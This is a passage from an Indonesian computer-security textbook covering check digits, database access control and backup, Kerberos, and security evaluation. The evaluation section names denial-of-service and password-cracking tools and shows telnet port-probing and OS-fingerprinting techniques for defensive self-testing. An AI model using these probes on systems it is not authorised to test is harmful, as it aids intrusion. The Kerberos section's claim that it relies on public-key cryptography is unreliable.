2. Hilangkan carrynya 0x00
Bila hasilnya 0x00, berarti tidak ada perubahan
Bila hasilnya tidak 0x00, berarti telah terjadi perubahan

Contoh Checksum
• Checksum-8 8 bit
• Checksum-16 16 bit
• Checksum-24 24 bit
• Checksum-32 32 bit
• Xor8 8 bit
• Algoritma Luhn 4 bit

7.3 Check Digit

Dipergunakan pada:
• Universal Product Code (UPC)
• ISBN 10
• ISBN 13
• Bank Account Number
• Credit Card Number
• ISSN
• Identity Card
• dll

• Angka terakhir pada UPC adalah check digit

Cara pengecekan UPC


1. Tambahkan angka-angka yang berada di posisi ganjil, kecuali
angka check digit.
2. Hasilnya dikalikan 3, kemudian ditambah dengan angka-angka
yang berada di posisi genap (termasuk angka check digit)
3. Hasilnya dimodulus dengan 10 dan harus menghasilkan angka 0
Keamanan Komputer 71
UPC
Contoh: 036000291452
1. 0+6+0+2+1+5 = 14 dan 14 X 3 = 42
2. 42 + 3 + 0 + 0 + 9 + 4 + 2 = 60
3. 60 mod 10 = 0

ISBN 10
• Angka terakhir dari 10 digit ISBN adalah check digit

Cara pengecekan ISBN 10


1. Kalikan setiap angka dengan urutan angka (dihitung dari kanan)
2. Hasilnya dimodulus 11 dan harus menghasilkan angka 0
Contoh: ISBN 0-201-53082-1
0x10 + 2x9 + 0x8 + 1x7 + 5x6 + 3x5 + 0x4 + 8x3 + 2x2 + 1x1 = 99
99 mod 11 = 0

ISSN
• Terdiri dari 8 digit dan angka terakhir adalah check digit
• Bila check digit menghasilkan angka 10, maka check digit diganti
dengan X

Cara pengecekan ISSN


1. Kalikan setiap angka dengan urutan angka (dihitung dari kanan)
2. Hasilnya dimodulus 11 dan harus menghasilkan angka 0
Contoh: 0378-5955
0x8 + 3x7 + 7x6 + 8x5 + 5x4 + 9x3 + 5x2 + 5x1 = 165
165 mod 11 = 0

Credit Card Number


• Umumnya terdiri dari 16 digit dan angka terakhir adalah check digit

Cara pengecekan Credit Card Number


1. Angka pada posisi ganjil dikalikan 2
2. Hasilnya ditambah dengan angka pada posisi genap
3. Hasilnya dimodulus 10 dan harus menghasilkan angka 0

72 Keamanan Komputer
BAB 8
KEAMANAN BASIS DATA
Tindakan back-up adalah salah satu aspek penting dari operasi system
komputer. Mendapatkan data yang valid, complete, up-to-date, adalah hal
utama yang diinginkan selalu, saat sebuah basis data sedang diakses.
Namun kesalahan seperti bugs, kecelakaan, malapetaka akibat human-
error, dan serangan ke basis data adalah sesuatu hal yang kadangkala
sulit untuk diprediksi namun dapat dicegah bila dilakukan tindakan
preventif sedini mungkin. Dengan melakukan tindakan back-up data
secara periodik, hal-hal yang sewajarnya bisa dihindari dapat
direalisasikan sehingga user dapat melakukan perbandingan antara sistem
di saat sekarang sedang berjalan dengan hasil back-up data sebelumnya.
Dengan demikian akan ada tindakan analisa apakah telah terjadi
perubahan data pada sistem ataukah masih berjalan sewajarnya.

Tujuan
1. Mengetahui dan Memahami aspek terpenting keamanan basis
data dan alasan melindunginya
2. Mengetahui dan Memahami klasifikasi keamanan basis data
3. Mengetahui dan Memahami apa yang menjadi aspek kehandalan
keamanan basis data
4. Mengetahui dan Memahami yang dimaksud back-up dan recovery
dan manfaatnya untuk keamanan basis data

8.1 Alasan utama aspek keamanan basis data

Mengapa masalah keamanan basis data menjadi penting ?


Jawaban secara sederhananya, sebagai berikut: basis-data merupakan
salah satu komponen yang penting dalam sistem informasi; karena
merupakan media utama dalam menyediakan informasi kepada user.
Alasan lain, adalah karena menyangkut informasi yang tersimpan dari
sebuah sistem atau organisasi pada media simpanan data itu sehingga
sangat penting sekali untuk dijaga keamanannya dari penggunaan orang
yang tidak memiliki otoritas.
Informasi yang disimpan bisa dalam bentuk hardcopy, atau dalam bentuk
softcopy. Dalam bentuk softcopy disebut database (basis data) sedangkan
penerapan data-base ke dalam sistem informasi disebut dengan database
system.

Keamanan Komputer 73
Beberapa hal penting mengapa harus menjadi perhatian khusus dalam
keamanan basis-data adalah sebagai berikut:
• Kemampuan menyediakan informasi dengan cepat dan akurat,
adalah merupakan kebutuhan dalam information-based society.
• Sangat pentingnya informasi sehingga hanya boleh diakses oleh
orang yang memiliki otorisas (hak akses).
• Adanya trend trade-secret, yaitu jual-beli data, sehingga ada muncul
perilaku untuk mencuri informasi, karena ada nilai ekonomis-nya.

8.1.1. Perubahan paradigma personal-computer menjadi


sharedcomputer

Awalnya sebuah komputer disebut PC (Personal Computer),


namun seiring dengan perkembangan bidang jaringan komputer, maka
sebuah computer tidak tepat lagi disebut PC, melainkan shared computer.
Shared computer biasanya digunakan untuk menyimpan data yang
bersifat classified information.

Shared computer adalah komputer yang saling dikoneksikan satu dengan


yang lain, sehingga user bisa saling berbagi informasi (shared-
resources), yang membentuk sebuah Local Area Network (LAN).
Dengan adanya LAN (computer networks) akan mempercepat user untuk
melakukan akses ke basis data.

Basis Data yang berada pada komputer dihubungkan ke jaringan


computer agar proses sharing-information dapat berjalan. Dengan
demikian, user dapat mengakses informasi yang diinginkan ke basis data
dari mana saja dan kapan saja.

Dengan adanya koneksi ke basis data dari segala arah, menyebabkan


beberapa hal baru yang mengkhawatirkan muncul seperti:
• Membuka potensi lubang keamanan untuk disusupi oleh penyadap
(matamata)
• User dihadapkan kepada pilihan: keamanan (secure) atau
kenyamanan (comfortable).
• Meningkatnya jumlah host yang digunakan seiring jumlah user yang
memiliki otoritas menyebabkan, lebih banyak server yang harus
ditangani; sehingga membutuh lebih banyak SDM yang handal dan
tersebar; padahal susah mencari SDM yang diinginkan berdasar
kebutuhan, untuk itu dilakukan desentralisasi server.
74 Keamanan Komputer
8.1.2. Klasifikasi Keamanan Basis Data

Klasifikasi Keamanan Basis Data dapat disebutkan sebagai berikut:

• Keamanan yang bersifat fisik (physical security), yaitu yang berdasar


pada aspek fisik perangkat. Misalkan ruang server, kunci komputer,
kartu elektronis.
• Keamanan yang berhubungan dengan orang (personel), yaitu user
yang diberi labelling untuk privillege akses pengguna.
• Keamanan dari data dan media serta teknik komunikasi, yaitu
bagaimana agar prosedur penyimpanan lebih aman, begitu juga pada
media yang digunakan dan teknik untuk mengamankan data tersebut.
• Keamanan dalam operasi, yaitu menyusun mekanisme
pengoperasian user agar terkontrol sehingga dapat diantisipasi
kesalahan yang terjadi saat penyimpanan dan pengambilan data.

Beberapa aspek untuk mendukung Keamanan Basis Data dapat


disebutkan sebagai berikut:

• Network security, memfokuskan kepada saluran pembawa informasi


serta sistem yang terintegrasi kepadanya (host dan kanal).
• Application security, memfokuskan kepada aplikasi itu sendiri (yang
digunakan untuk basis data atau yang menjadi antar-muka kepada
basis data), beserta aplikasi dukungan lainnya kepada basis data itu
sendiri.
• Computer security, memfokuskan kepada keamanan dari komputer
(end system) yang digunakan, khususnya hardware pada komputer
tersebut.

Selanjutnya, aspek kehandalan terhadap Keamanan Basis Data, yaitu:

• Privacy / confidentiality
Seperti bagaimana memproteksi data bersifat pribadi yang sensitive
seperti:nama, tempat tanggal lahir, agama, hobby, penyakit yang
pernah diderita, status perkawinan; data pelanggan; dan transaksi
pada ecommerce. Juga khususnya melakukan proteksi terhadap
serangan sniffer.

• Integrity
Tindakan bagaimana agar informasi tidak berubah tanpa ijin seperti:
Keamanan Komputer 75
o Tampered (data baru menimpa data lama)
o Altered (perubahan terhadap nilai data yang eksis, yakni
data ter-edit)
o Modified (data yang eksis dapat disisipkan, ditambah,
dihapus oleh data baru)
Khususnya melakukan proteksi terhadap serangan: spoof, virus,
Trojan horse.

• Authentication (otentikasi)
Tindakan otentifikasi dilakukan untuk meyakinkan keaslian data,
sumber data yang diakses, user yang mengakses data, serta server
yang digunakan, dengan melakukan cara seperti: penggunaan digital
signature, dan biometrics.
Ini dilakukan untuk memproteksi terhadap serangan seperti
password palsu.

• Availability
Artinya, informasi harus dapat tersedia ketika dibu tuhkan, dengan
menghindari server dibuat hang, down, crash.
Tindakan ini bertujuan untuk proteksi terhadap serangan: denial of
service (DoS) attack.

• Non-repudiation
Non-repudiation maksudnya menghindari akses-user agar tidak
dapat menyangkal bahwa telah melakukan transaksi; dengan cara
setiap akhir transaksi pada form dilengkapi dengan penggunaan
digital signature.
Hal ini dilakukan untuk proteksi terhadap serangan: deception.

• Access control
Dengan adanya access control, maka ada sebuah mekanisme yang
digunakan untuk mengatur user dan akses yang dilakukan oleh user
(siapa boleh melakukan apa).

Beberapa caranya seperti:


o Dengan menggunakan password.
o Membuat kelas / klasifikasi privillege- user.
Ini bertujuan untuk melakukan proteksi terhadap serangan: intruder.

76 Keamanan Komputer
Batasan privillege-user untuk Access Control pada basis data ditunjukkan
pada skema berikut ini:

Gambar 8.1 Pembatasan akses pada basis data

8.2 Klasifikasi file (arsip)

Master File (File Induk): dalam sebuah aplikasi, file ini merupakan file
yang penting karena berisi record-record yang sangat perlu di dalam
organisasi.

Transaction File (File Transaksi): digunakan untuk merekam data hasil


dari transaksi yang terjadi.

Report File (File Laporan): berisi informasi-informasi yang akan


ditampilkan.

History File (File Sejarah): berisi data masa lalu yang sudah tidak aktif
lagi, namun masih tetap disimpan sebagai arsip.

Backup File (File Pelapis): salinan dari file-file yang masih aktif di dalam
basis data pada suatu saat tertentu

Keamanan Komputer 77
Hirarki organisasi data dapat ditunjukkan sebagai berikut:

Gambar 8.2 Jenjang level data pada Basis Data

Penjelasannya sebagai berikut:


• Bit merupakan unit data yang terkecil dan terdiri dari biner 1 atau 0.
• Byte yaitu suatu kelompok yang terdiri dari beberapa bit yang
menggambarkan satu angka, karakter atau simbol lainnya.
• Field yaitu kelompok karakter, angka atau simbol-simbol menjadi
suatu kata, kelompok huruf atau kelompok angka.
• Record yakni kelompok dari suatu field.
• Arsip (file) adalah kelompok dari record yang mempunyai tipe yang
sama.
• Database yaitu kelompok dari arsip-arsip yang berhubungan.

8.3 Serangan (attack) terhadap basis data

Jenis-jenis serangan (attack):

• Interruption, yaitu penghentian sebuah proses yang sedang berjalan.


• Interception yaitu menyela sebuah proses yang sedang berjalan.
• Modification yaitu mengubah data tanpa ijin dari pihak otoritas.
• Fabrication yaitu serangan yang bersifat destruktif berupa perusakan
secara mendasar pada sistem utama.

78 Keamanan Komputer
Gambar 8.3
Skema Akses dan Prosedur pada Basis Data yang terkoneksi online

Perlunya keamanan menyeluruh pada Basis Data disebabkan keamanan


merupakan suatu proteksi terhadap pengrusakan data dan pemakaian data
oleh user yang tidak memiliki otoritas.

Oleh sebab itu untuk menjaga keamanan Basis Data dibutuhkan beberapa
cara seperti:
• Penentuan perangkat lunak Basis Data Server yang handal.
• Pemberian otoritas kepada user mana saja yang berhak
mengakses, serta memanipulasi data-data yang ada.

Gambar 8.4
Skema Lapisan pada Basis Data yang dinterkoneksikan dengan aplikasi

Keamanan Komputer 79
Beberapa penyalahgunaan basis data:

• Tidak disengaja, misalnya sebagai berikut:


o kerusakan selama proses transaksi
o keadaan yang disebabkan oleh akses database yang
konkuren
o keadaan yang disebabkan oleh pendistribuasian data pada
beberapa komputer
o logika error yang mengancam kemampuan transaksi
untuk mempertahankan konsistensi database.
• Disengaja oleh pihak yang tidak ada otoritas, seperti misalnya:
o Pengambilan data / pembacaan data
o Pengubahan data
o Penghapusan data

Tingkatan entitas pada Keamanan Basis Data, dapat disebutkan sebagai


berikut:
• Physical, yaitu lokasi-lokasi dimana terdapat sistem komputer
haruslah aman secara fisik terhadap serangan destroyer.
• User, yaitu wewenang user harus dilakukan dengan berhati-hati
untuk mengurangi kemungkinan adanya manipulasi oleh user
lain yang otoritas.
• Sistem Operasi, yaitu kelemahan entitas ini memungkinkan
pengaksesan data oleh user tak berwenang, karena hampir
seluruh jaringan system basis-data berjalan secara on-line.
• Sistem Basisdata, yaitu pengaturan hak pengguna yang baik.

Gambar 8.5 Skema Utama Mekanisme Keamanan Basis Data on-line


80 Keamanan Komputer
Alasan mengapa dibutuhkan otoritas pada keamanan basis data, yaitu:
• Pemberian wewenang atau hak istimewa (priviledge) untuk
mengakses sistem basis data.
• Kendali otorisasi dapat dibangun pada perangkat lunak dengan 2
fungsi, yaitu:
• Mengendalikan sistem atau obyek yang dapat diakses
• Mengendalikan bagaimana user menggunakannya
• Sistem administrasi yang bertanggungjawab untuk memberikan hak
akses dengan membuat user account.

Sedangkan yang dimaksud dengan Tabel View pada keamanan basis data
adalah metode pembatasan bagi user untuk mendapatkan model basis-
data yang sesuai dengan kebutuhan pengguna.Metode ini dapat
menyembunyikan data yang tidak digunakan atau tidak perlu dilihat oleh
user.

Untuk pengamanan pada Basis Data Relasional dilakukan beberapa level


seperti:
• Relation, yaitu user diperbolehkan atau tidak diperbolehkan
mengakses langsung suatu relasi.
• View, yaitu user diperbolehkan atau tidak diperbolehkan
mengakses data yang tertampil pada view.
• Read Authorization, yaitu user diperbolehkan membaca data,
tetapi tidak dapat memodifikasi.
• Insert Authorization, yaitu user diperbolehkan menambah data
baru, tetapi tidak dapat memodifikasi data yang sudah ada.
• Update Authorization, yaitu user diperbolehkan memodifikasi
data, tetapi tidak dapat menghapus data.
• Delete Authorization, yaitu user diperbolehkan menghapus data.

Beberapa otorisasi tambahan untuk Modifikasi Data (Update


Authorization), seperti:
• Index Authorization adalah user diperbolehkan membuat dan
menghapus index data.
• Resource Authorization adalah user diperbolehkan membuat
relasi-relasi baru.
• Alteration Authorization adalah user diperbolehkan menambah/
menghapus atribut suatu relasi.

Keamanan Komputer 81
• Drop Authorization adalah user diperbolehkan menghapus relasi
yang sudah ada.

Contoh perintah menggunakan SQL:


GRANT : memberikan wewenang kepada pemakai
Syntax : GRANT <priviledge list> ON <nama relasi/view> TO
<pemakai>
Contoh :
GRANT SELECT ON S TO BUDI
GRANT SELECT,UPDATE (STATUS,KOTA) ON S TO ALI,BUDI
REVOKE : mencabut wewenang yang dimiliki oleh pemakai
Syntax : REVOKE <priviledge list> ON <nama relasi/view> FROM
<pemakai>
Contoh :
REVOKE SELECT ON S FROM BUDI
REVOKE SELECT,UPDATE (STATUS,KOTA) ON S FROM
ALI,BUDI

Priviledge list : READ, INSERT, DROP, DELETE, INDEX,


ALTERATION,
RESOURCE

8.4 Back-up data dan recovery

Tindakan back-up adalah proses secara periodik untuk mebuat


duplikat dari basis-data dan melakukan logging-file (atau program) ke
media penyimpanan eksternal.
Sedangkan tindakan recovery (pemulihan) adalah merupakan upaya
untuk mengembalikan basis data ke keadaaan yang dianggap benar
setelah terjadinya suatu kegagalan.

Ada tiga jenis tindakan pemulihan, yaitu:


• Pemulihan terhadap kegagalan transaksi : yaitu kesatuan prosedur
alam program yang dapat mengubah / memperbarui data pada
sejumlah tabel.
• Pemulihan terhadap kegagalan media : yaitu pemulihan karena
kegagalan media dengan cara mengambil atau memuat kembali
salinan basis data (back-up)
• Pemulihan terhadap kegagalan sistem : yakni karena gangguan
sistem, hang, listrik terputus alirannya.
82 Keamanan Komputer
Fasilitas pemulihan pada DBMS (Database Management Systems):
• Mekanisme back-up secara periodik
• Fasilitas logging (log-book) dengan membuat track pada
tempatnya saat transaksi berlangsung dan pada saat database
berubah.
• Fasilitas checkpoint, melakukan update database yang terbaru.
• Manager pemulihan, memperbolehkan sistem untuk menyimpan
ulang database menjadi lebih konsisten setelah terjadinya
kesalahan.

8.5. Infrastruktur jaringan untuk server database.

1. Pisahkan database server dari application server


– Model 3-tier, bukan 2-tier
– 2-tier, jika hacker berhasil menjebol web server, maka
mereka akan memperoleh akses ke database kita.
– Muncul masalah
• ada cost untuk server lagi, tetapi lebih murah disbanding
kerugian bila database dicuri orang
• 3-tier kinerja menurun karena butuh waktu untuk
transfer data antara web dan database server, tetapi pada
kenyataannya justru yang butuh waktu lama adalah
transfer dari client ke application server
• Database Application server cepat, karena intranet

2. Jangan menaruh database server di area DMZ


– Kalau di DMZ, dapat diakses dari publik
– Ada pemikiran bila ditaruh pada area DMZ dan dipasang
firewall maka database server aman (tidak aman)
– Memang benar firewall akan men-drop paket yang datang
dari luar menuju ke database server, tetapi tidak men-drop
paket yang datang dari area DMZ, misalnya mail server
yang telah ‘tercemar’

Keamanan Komputer 83
Ada 2 cara penerapan database server bila di luar DMZ

Firewall sebelah kanan, dikonfigurasi agar yang menuju ke ‘data1’ harus


berasal dari ‘web1’ dan melalui port 4100
Jika ada server lain yang ‘tercemar’ di area DMZ, maka server itu tidak
dapat menyerang ‘data1’

Firewall dikonfigurasi agar yang menuju ke ‘data1’ harus berasal dari


‘web1’ dan melalui port 4100
Jika ada server lain yang ‘tercemar’ di area DMZ, maka server itu tidak
dapat menyerang ‘data1’
‘data1’ tidak menerima paket yang datang dari luar

3. Ganti Peralatan Hub dengan Switch


– Untuk menghindari bila intruder memasang program di
salah satu server untuk menangkap data yang lewat pada
jaringan
– Kebanyakan switch dapat dikontrol melalui telnet konsol
– Apakah dengan memakai switch sudah aman ??
– Bagaimana bila intruder sudah menguasai salah satu
server dan berusaha untuk mendapatkan akses ke switch

84 Keamanan Komputer
– Jika switch sudah dikuasai, maka intruder dapat
meneruskan trafik di area DMZ ke port dari server yang
sudah dikuasai

4. Enkripsi Data Antara Web dan Database Server


– Ada yang mengatakan, “Saya sudah menggunakan SSL,
sehingga datanya aman”
– Perlu diingat, SSL itu hanya dari client ke web server
– Bagaimana dari web ke database server ?? TIDAK
DIENKRIP
– Jadi ?? Trafik data antara web dan database server harus
dienkrip
– Caranya ?? Beberapa database engine sudah dilengkapi
dengan enkripsi melalui SSL
– Bagaimana kalau belum dilengkapi dengan SSL ?? Bisa
menggunakan SSH Port Forwarding dan STunnel

Keamanan Komputer 85
BAB 9
KERBEROS
Aliran informasi dalam jaringan yang sangat deras dan beragam
membuat keamanan jaringan adalah hal yang sangat penting dan rentan
akan gangguan.
Kerberos merupakan suatu teknik keamanan dari aspek otentikasi.
Kerberos memungkinkan client dan server untuk saling mengotentikasi
sebelum melakukan koneksi. Pada bab ini dibahas mengenai apa dan
bagaimana Kerberos itu.

Tujuan

1. Mengetahui dan Memahami pola langkah keamanan khusus.


2. Mengetahui dan Memahami mekanisme Kerberos

9.1 Definisi dan Struktur Kerberos

Kerberos berasal dari Cerberus yaitu nama makhluk berkepala


tiga yang menjaga dunia bawah (underworld) dari makhluk hidup yang
mencoba untuk memasukinya menurut mitologi Yunani.

Kerberos pada dasarnya diperuntukan menangani masalah


otentikasi. Kerberos memungkinkan server dan client saling melakukan
otentikasi sebelum membuat suatu koneksi. Protokol ini dibuat oleh MIT
(Massachusetts Institute of Technology ) tahun 1980. Pada prinsipnya
pola kerja Kerberos adalah membuat satu server relatif handal ditinjau
dari segi keamanan disebut server Kerberos. Server ini akan melakukan
otentikasi terhadap password dari client. Dimana pihak client yang sudah
dinyatakan valid dapat memperoleh otorisasi untuk akses atau melakukan
operasi tertentu.

Pada Kerberos username dan password client tidak dikirim


melalui jaringan. Tetapi memakai sesssion key yang ditujukan untuk
meningkatkan keamanan komunikasi dengan protokol Kerberos. Struktur
Kerberos

86 Keamanan Komputer
Gambar 9.1 Struktur Kerberos

9.2 Mekanisme Kerberos

Enkripsi

Kerberos menyiapkan sarana enkripsi karena informasi dapat mengalami


penyadapan (leakage) di jaringan.

Enkripsi Kerberos menggunakan algoritma kunci simetris sebagai contoh


DES (Data Encryption Standard) dan AES (Advanced Encryption
Standard). dimana algoritma ini bekerja relative cepat karena penggunaan
kunci yang sama saat enkripsi dan dekripsi.

Kerberos akan memberikan tiket pada client dan server yang telah
dienkripsi, jika server dan client berkomunikasi dengan membandingkan
tiket yang diberikan oleh Kerberos, jika sama maka komunikasi dapat
dilanjutkan.

Otentikasi

Untuk aspek keamanan ini Kerberos memakai metode key exchange


(pertukaran kunci)
• Dimana pertukaran kunci ini mengandalkan public key cryptography
dan teknologi digital signature
• Kerberos menggunakan kunci cryptographic yang disebut "tickets"
untuk mengendalikan akses terhadap sumber daya server jaringan

Keamanan Komputer 87
• Tickets merupakan encrypted passes atau encrypted files yang
dikeluarkan oleh "trusted" server kepada user dan proses untuk
menentukan access level

Tahapan proses otentikasi oleh server Kerberos adalah sebagai berikut:

Mulanya client meminta sebuah ticket pada Kerberos dengan


mengirimkan namanya. Kemudian server Kerberos mengenali client ada
pada data basenya dan merespon dengan memberikan:
• Sebuah client ticket yang telah dienkripsi dengan kunci client
• Sebuah granting ticket yang dienkripsi dengan kunci rahasia
Server Kerberos

Gambar 9.2 proses otentikasi & otorisasi

Ticket Granting Service


Jika client terotentikasi pada Kerberos maka client tersebut tidak dapat
langsung melakukan hubungan dengan layanan (server) yang ia
butuhkan, tetapi harus melakukan permintaan kepada Kerberos lebih
dahulu.

Prosesnya:
Ticket Granting Ticket (TGT) yang diterima pada saat otentikasi
digunakan untuk memeriksa kesesuaian antara nama client dan kuncinya,
jika sesuai maka akan dilakukan deskripsi client
1. Client Ticket akan digunakan oleh client dan server untuk
berkomunikasi, seluruhnya dienkripsi dengan kunci yang
hanya diketahui client dan Kerberos.
2. Server Ticket dienkripsi dengan menggunakan kunci rahasia
server dan Kerberos

88 Keamanan Komputer
Kemudian client mengirimkan server ticket ini kepada server. Setelah
client menerima balasan dari Kerberos berupa kunci enkripsi tersebut,
client mendekripsi client ticket. Server mendekripsi server ticket dengan
menggunakan kunci rahasianya dan memperoleh kunci enkripsi dari
Kerberos untuk mendekripsi client. Jika terjadi kesesuaian maka
komunikasi berlanjut.

Gambar 9.3 Proses Kerberos

Kelebihan Kerberos
• Pembaharuan otorisasi berupa tiket dapat diselenggarakan
sesegera mungkin
• Relatif aman dan terpercaya karenahanya ada satu Server
Kerberos

Keterbatasan dan Kelemahan Kerberos


• Karena server Kerberos hanya satu sedangkan client yang
mengakses Banyak maka cenderung rentan terhadap serangan
denial-of-service
▪ Sever tidak perlu dibuat benar-benar crash, cukup dibanjiri
request maka server akan kesulitan untuk menanggapi request
• Bisa saja membangun server Kerberos backup, tetapi ini menyalahi
filosofi Kerberos
▪ Memunculkan kelemahan pada jaringan

Keamanan Komputer 89
BAB 10
EVALUASI KEAMANAN SISTEM INFORMASI
10.1 Penyebab masalah keamanan harus selalu dimonitor :

• Ditemukannya lubang keamanan (security hole) yang baru. Perangkat


lunak dan perangkat keras biasanya sangat kompleks sehingga tidak
mungkin untuk diuji seratus persen. Kadang-kadang ada lubang
keamanan yang ditimbulkan oleh kecerobohan implementasi.

• Kesalahan konfigurasi. Kadang-kadang karena lalai atau alpa,


konfigurasi sebuah sistem kurang benar sehingga menimbulkan
lubang keamanan. Misalnya mode (permission atau kepemilikan) dari
berkas yang menyimpan password (/etc/passwd di sistem UNIX)
secara tidak sengaja diubah sehingga dapat diubah atau ditulis oleh
orang-orang yang tidak berhak.

• Penambahan perangkat baru (hardware dan/atau software) yang


menyebabkan menurunnya tingkat security atau berubahnya metoda
untuk mengoperasikan sistem. Operator dan administrator harus
belajar lagi. Dalam masa belajar ini banyak hal yang jauh dari
sempurna, misalnya server atau software masih menggunakan
konfigurasi awal dari vendor (dengan password yang sama).

Tujuan :
1. Mengetahui dan Memahami Penyebab Masalah Keamanan Pada
Sistem Komputer
2. Mengetahui dan Memahami Pengujian Keamanan Sistem
Komputer

10.2 Sumber Lubang Keamanan

1. Salah Disain (design flaw)

• Umumnya jarang terjadi. Akan tetapi apabila terjadi sangat sulit


untuk diperbaiki. Akibat disain yang salah, maka biarpun dia
diimplementasikan dengan baik, kelemahan dari sistem akan tetap
ada.

90 Keamanan Komputer
• Contoh :
• Lemah disainnya algoritma enkripsi ROT13 atau Caesar
cipher, dimana karakter digeser 13 huruf atau 3 huruf.
Meskipun diimplementasikan dengan programming yang
sangat teliti, siapapun yang mengetahui algoritmanya dapat
memecahkan enkripsi tersebut.
• Kesalahan disain urutan nomor (sequence numbering) dari
paket TCP/IP. Kesalahan ini dapat dieksploitasi sehingga
timbul masalah yang dikenal dengan nama “IP spoofing”
(sebuah host memalsukan diri seolah-olah menjadi host lain
dengan membuat paket palsu setelah engamati urutan paket
dari host yang hendak diserang).

2. Implementasi kurang baik

• Banyak program yang diimplementasikan secara terburu -buru


sehingga kurang cermat dalam pengkodean.
• Akibat tidak adanya cek atau testing implementasi suatu program
yang baru dibuat.
• Contoh:
• Tidak memperhatikan batas (“bound”) dari sebuah “array”
tidak dicek sehingga terjadi yang disebut out-of-bound array
atau buffer overflow yang dapat dieksploitasi (misalnya
overwrite ke variable berikutnya).
• Kealpaan memfilter karakter-karakter yang aneh-aneh yang
dimasukkan sebagai input dari sebuah program sehingga
sang program dapat mengakses berkas atau informasi yang
semestinya tidak boleh diakses.

3. Salah konfigurasi
Contoh :
• Berkas yang semestinya tidak dapat diubah oleh pemakai
secara tidak sengaja menjadi “writeable”. Apabila berkas
tersebut merupakan berkas yang penting, seperti berkas yang
digunakan untuk menyimpan password, maka efeknya
menjadi lubang keamanan. Kadangkala sebuah komputer
dijual dengan konfigurasi yang sangat lemah.
• Adanya program yang secara tidak sengaja diset menjadi
“setuid root” sehingga ketika dijalankan pemakai memiliki
akses seperti super user (root) yang dapat melakukan apa saja.

Keamanan Komputer 91
4. Salah menggunakan program atau sistem
Contoh :
• Kesalahan menggunakan program yang dijalankan dengan
menggunakan account root (super user) dapat berakibat fatal.

10.3 Pengujian Keamanan Sistem

Untuk memudahkan administrator dari sistem informasi membutuhkan


“automated tools”, perangkat pembantu otomatis, yang dapat membantu
menguji atau mengevaluasi keamanan sistem yang dikelola.

Contoh Tools Terintegrasi:

Perangkat lunak bantu Sistem Operasi


Cops UNIX
Tripwire UNIX
Satan/Saint UNIX
SBScan: localhost security scanner UNIX
Ballista <http://www.secnet.com> Windows NT

Contoh Tools Pengujian yang dibuat para hacker :

Tools Kegunaan
Crack program untuk menduga atau memecahkan password
dengan menggunakan sebuah atau beberapa kamus
(dictionary). Program crack ini melakukan brute
force cracking dengan mencoba mengenkripsikan
sebuah kata yang diambil dari kamus, dan kemudian
membandingkan hasil enkripsi dengan password
yang ingin dipecahkan.
land dan latierra sistem Windows 95/NT menjadi macet (hang, lock
up). Program ini mengirimkan sebuah paket yang
sudah di”spoofed” sehingga seolah-olah paket
tersebut berasal dari mesin yang sama dengan
menggunakan port yang terbuka
Ping-o-death sebuah program (ping) yang dapat meng-crash-kan
Windows 95/NT dan beberapa versi Unix.
Winuke program untuk memacetkan sistem berbasis
Windows
Dan sebagainya…

92 Keamanan Komputer
Probing Services

• Defenisi Probing : “probe” (meraba) servis apa saja yang tersedia.


Program ini juga dapat digunakan oleh kriminal untuk melihat
servis apa saja yang tersedia di sistem yang akan diserang dan
berdasarkan data-data yang diperoleh dapat melancarkan
serangan.

• Service di Internet umumnya dilakukan dengan menggunakan


protokol TCP atau UDP. Setiap servis dijalankan dengan
menggunakan port yang berbeda, misalnya:
o SMTP, untuk mengirim dan menerima e-mail, TCP,
port 25
o POP3, untuk mengambil e-mail, TCP, port 110

Contoh di atas hanya sebagian dari servis yang tersedia. Di


system UNIX, lihat berkas /etc/services dan /etc/inetd.conf untuk
melihat servis apa saja yang dijalankan oleh server atau komputer
yang bersangkutan.

• Pemilihan servis apa saja tergantung kepada kebutuhan dan


tingkat keamanan yang diinginkan. Sayangnya seringkali sistem
yang dibeli atau dirakit menjalankan beberapa servis utama
sebagai “default”. Kadang-kadang beberapa servis harus
dimatikan karena ada kemungkinan dapat dieksploitasi oleh
cracker. Untuk itu ada beberapa program yang dapat digunakan
untuk melakukan

• Untuk beberapa servis yang berbasis TCP/IP, proses probe dapat


dilakukan dengan menggunakan program telnet. Misalnya untuk
melihat apakah ada servis e-mail dengan menggunakan SMTP
digunakan telnet ke port 25 dan port 110.
unix% telnet target.host.com 25
unix% telnet localhost 110

Keamanan Komputer 93
Program penguji probing (penguji semua port otomatis) :

Paket probe untuk sistem UNIX


• nmap
• strobe
• tcpprobe

Probe untuk sistem Window 95/98/NT


• NetLab
• Cyberkit
• Ogre

Program yang memonitor adanya probing ke system


Probing biasanya meninggalkan jejak di berkas log di system
anda. Dengan mengamati entry di dalam berkas log dapat diketahui
adanya probing. Selain itu, ada juga program untuk memonitor probe
seperti paket program courtney, portsentry dan tcplogd.

OS fingerprinting

• Fingerprinting : Analisa OS sistem yang ditujua agar dapat melihat


database kelemahan sistem yang dituju.
• Metode Fingerprinting :
• Cara yang paling konvensional :
o Service telnet ke server yang dituju, jika server tersebut
kebetulan menyediakan servis telnet, seringkali ada banner
yang menunjukkan nama OS beserta versinya.
o Service FTP di port 21. Dengan melakukan telnet ke port
tersebut dan memberikan perintah “SYST” anda dapat
mengetahui versi dari OS yang digunakan.
o Melakukan finger ke Web server, dengan menggunakan
program netcat (nc).
• Cara fingerprinting yang lebih canggih adalah dengan mengan alisa
respon sistem terhadap permintaan (request) tertentu. Misalnya
dengan menganalisa nomor urut packet TCP/IP yang dikeluarkan oleh
server tersebut dapat dipersempit ruang jenis dari OS yang digunakan.
Ada beberapa tools untuk melakukan deteksi OS ini antara lain:
o nmap
o queso

94 Keamanan Komputer
Penggunaan program penyerang

• Untuk mengetahui kelemahan sistem informasi adalah dengan


menyerang diri sendiri dengan paket-paket program penyerang
(attack) yang dapat diperoleh di Internet.

• Selain program penyerang yang sifatnya agresif melumpuhkan sistem


yang dituju, ada juga program penyerang yang sifatnya melakukan
pencurian atau penyadapan data.

• Untuk penyadapan data, biasanya dikenal dengan istilah “sniffer”.


Meskipun data tidak dicuri secara fisik (dalam artian menjadi hilang),
sniffer ini sangat berbahaya karena dia dapat digunakan untuk
menyadap password dan informasi yang sensitif. Ini merupakan
serangan terhadap aspek privacy.

• Contoh program penyadap (sniffer) antara lain:


o pcapture (Unix)
o sniffit (Unix)
o tcpdump (Unix)
o WebXRay (Windows)

Penggunaan sistem pemantau jaringan

• Sistem pemantau jaringan (network monitoring) dapat digunakan


untuk mengetahui adanya lubang keamaman.

• Misalnya apabila anda memiliki sebuah server yang semetinya hanya


dapat diakses oleh orang dari dalam, akan tetapi dari pemantau
